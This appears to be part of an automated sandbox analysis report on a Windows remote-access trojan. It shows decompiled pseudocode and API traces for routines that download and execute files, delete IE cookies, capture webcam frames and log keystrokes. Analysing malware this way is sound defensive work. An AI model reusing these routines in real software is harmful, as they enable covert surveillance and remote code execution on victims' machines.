                                                                                • Instruction Fuzzy Hash: 1141D571904708FBCB14F7E8E8499EFBB7CAB81300B14447BF403B3191DA795A598B5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D4E5, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 132filenetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D625
                                                                                • free.MSVCRT(?,0041BA5C,?), ref: 0040D643
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                  • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                                                                  • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                                                                  • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                                                                  • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                                                                  • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                                                                  • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                                                                • String ID: open
                                                                                • API String ID: 2294739476-2758837156
                                                                                • Opcode ID: 116c612a25176188bdba456355ef9aa21b96b1dc395a3104552b31ad9d06bf76
                                                                                • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                                                                • Opcode Fuzzy Hash: 116c612a25176188bdba456355ef9aa21b96b1dc395a3104552b31ad9d06bf76
                                                                                • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407767, Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,0001781A,00000000), ref: 00407779
                                                                                  • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                                                                  • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                                                                  • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                                                                  • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104), ref: 004077E7
                                                                                • ExpandEnvironmentStringsA.KERNEL32(00000000), ref: 004077EE
                                                                                • PathFileExistsA.SHLWAPI(?), ref: 004077FB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,00000000), ref: 0040781D
                                                                                  • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                  • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                  • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                  • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                  • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00407834
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                                                                  • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                                                                  • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                                                                  • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                                                                  • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                                                                  • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407846
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040784F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000), ref: 00407884
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 0040789E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                                                                • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                • API String ID: 4038348890-4073444585
                                                                                • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                                                                • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                                                                • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                                                                • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401CCF, Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 132sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 19%
                                                                                			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* __ebp;
				void* _t22;
				void* _t23;
				void* _t32;
				char* _t33;
				void* _t36;
				void* _t38;
				signed char _t39;
				signed char _t41;
				char* _t42;
				int _t43;
				intOrPtr _t65;
				signed char _t66;
				void* _t68;
				intOrPtr* _t71;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t71 = _t68 + 0x24;
				_t22 = _t65 - 0x3c;
				if(_t22 == 0) {
					_t23 = E0040180C( &_v20, __eflags, 0);
					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t66 = E00406DD9(_t23);
					__eflags = _t66;
					if(_t66 != 0) {
						 *0x41b2ec = E00407033(_t66, "OpenCamera");
						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
						 *0x41b2f4 = E00407033(_t66, "GetFrame");
						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
						 *0x41b2e8 = 1;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
						_push(0x1b);
						goto L15;
					}
				} else {
					_t32 = _t22 - 1;
					if(_t32 == 0) {
						__eflags =  *0x41b2e9;
						if(__eflags != 0) {
							goto L8;
						}
					} else {
						_t36 = _t32 - 1;
						if(_t36 == 0) {
							 *0x41b2f0();
							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
						} else {
							_t38 = _t36 - 1;
							if(_t38 == 0) {
								_t39 =  *0x41b2ec();
								__eflags = _t39;
								 *0x41b2e9 = _t39;
								if(__eflags == 0) {
									goto L9;
								} else {
									L8:
									_t33 = E0040180C( &_v20, __eflags, 0);
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									_push(atoi(_t33));
									_push(_a4);
									E00401EA2(__eflags);
								}
							} else {
								if(_t38 == 1) {
									_t41 =  *0x41b2ec();
									_t81 = _t41;
									 *0x41b2e9 = _t41;
									if(_t41 == 0) {
										L9:
										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
										_push(0x41);
										L15:
										E004020C2(_a4);
									} else {
										_t42 = E0040180C( &_v20, _t81, 0);
										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
										_t43 = atoi(_t42);
										 *_t71 = 0x3e8;
										Sleep(??);
										E00401EA2(_t81);
										 *0x41b2f0(_a4, _t43);
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                                                                0x00401cd9
                                                                                0x00401cdf
                                                                                0x00401cf1
                                                                                0x00401d01
                                                                                0x00401d10
                                                                                0x00401d1a
                                                                                0x00401d21
                                                                                0x00401d24
                                                                                0x00401d27
                                                                                0x00401e08
                                                                                0x00401e0f
                                                                                0x00401e1b
                                                                                0x00401e1e
                                                                                0x00401e20
                                                                                0x00401e33
                                                                                0x00401e43
                                                                                0x00401e53
                                                                                0x00401e60
                                                                                0x00401e67
                                                                                0x00401e73
                                                                                0x00401e79
                                                                                0x00000000
                                                                                0x00401e79
                                                                                0x00401d2d
                                                                                0x00401d2d
                                                                                0x00401d2e
                                                                                0x00401df4
                                                                                0x00401dfb
                                                                                0x00000000
                                                                                0x00401e01
                                                                                0x00401d34
                                                                                0x00401d34
                                                                                0x00401d35
                                                                                0x00401de2
                                                                                0x00401de8
                                                                                0x00401d3b
                                                                                0x00401d3b
                                                                                0x00401d3c
                                                                                0x00401d92
                                                                                0x00401d98
                                                                                0x00401d9a
                                                                                0x00401d9f
                                                                                0x00000000
                                                                                0x00401da1
                                                                                0x00401da1
                                                                                0x00401da6
                                                                                0x00401dad
                                                                                0x00401dba
                                                                                0x00401dbb
                                                                                0x00401dbe
                                                                                0x00401dc3
                                                                                0x00401d3e
                                                                                0x00401d3f
                                                                                0x00401d45
                                                                                0x00401d4b
                                                                                0x00401d4d
                                                                                0x00401d52
                                                                                0x00401dcb
                                                                                0x00401dd5
                                                                                0x00401ddb
                                                                                0x00401e7b
                                                                                0x00401e7e
                                                                                0x00401d54
                                                                                0x00401d59
                                                                                0x00401d60
                                                                                0x00401d67
                                                                                0x00401d6f
                                                                                0x00401d76
                                                                                0x00401d80
                                                                                0x00401d87
                                                                                0x00401d87
                                                                                0x00401d52
                                                                                0x00401d3f
                                                                                0x00401d3c
                                                                                0x00401d35
                                                                                0x00401d2e
                                                                                0x00401e86
                                                                                0x00401e8e
                                                                                0x00401e97
                                                                                0x00401ea1

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 00401CF1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                                                                • atoi.MSVCRT ref: 00401D67
                                                                                • Sleep.KERNEL32 ref: 00401D76
                                                                                  • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                                                                  • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                                                                  • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                                                                  • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                                                                  • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                                                                  • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                                                                  • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                                                                  • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                                                                • atoi.MSVCRT ref: 00401DB4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                                                                • API String ID: 3050406488-3547787478
                                                                                • Opcode ID: b56e0d0e4fbfe05fd84352f21730365c874d700d43d808a0f1e6033429ded951
                                                                                • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                                                                • Opcode Fuzzy Hash: b56e0d0e4fbfe05fd84352f21730365c874d700d43d808a0f1e6033429ded951
                                                                                • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405DD3, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 75timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 33%
                                                                                			E00405DD3(void* __ecx, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char* _t24;
				char* _t25;
				char* _t33;
				int _t34;
				void* _t46;
				void* _t47;

				_t47 = __ecx;
				GetLocalTime( &_v20);
				_t24 =  &_v52;
				L00414176();
				_t25 =  &_v36;
				L00414170();
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t46 = malloc(_t25 + 0x64);
				_t33 = _v20.wYear & 0x0000ffff;
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				_t34 = sprintf(_t46, _t33);
				if( *((char*)(_t47 + 0x3c)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
				}
				if( *((char*)(_t47 + 0x3d)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
					_t20 = _t47 + 0x34; // 0x0
					_t34 = SetEvent( *_t20);
				}
				free(_t46);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t34;
			}












                                                                                0x00405dde
                                                                                0x00405de1
                                                                                0x00405df0
                                                                                0x00405df9
                                                                                0x00405e02
                                                                                0x00405e06
                                                                                0x00405e12
                                                                                0x00405e1b
                                                                                0x00405e24
                                                                                0x00405e2d
                                                                                0x00405e3d
                                                                                0x00405e5c
                                                                                0x00405e61
                                                                                0x00405e69
                                                                                0x00405e76
                                                                                0x00405e7c
                                                                                0x00405e7c
                                                                                0x00405e86
                                                                                0x00405e8c
                                                                                0x00405e92
                                                                                0x00405e95
                                                                                0x00405e95
                                                                                0x00405e9c
                                                                                0x00405ea6
                                                                                0x00405eaf

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
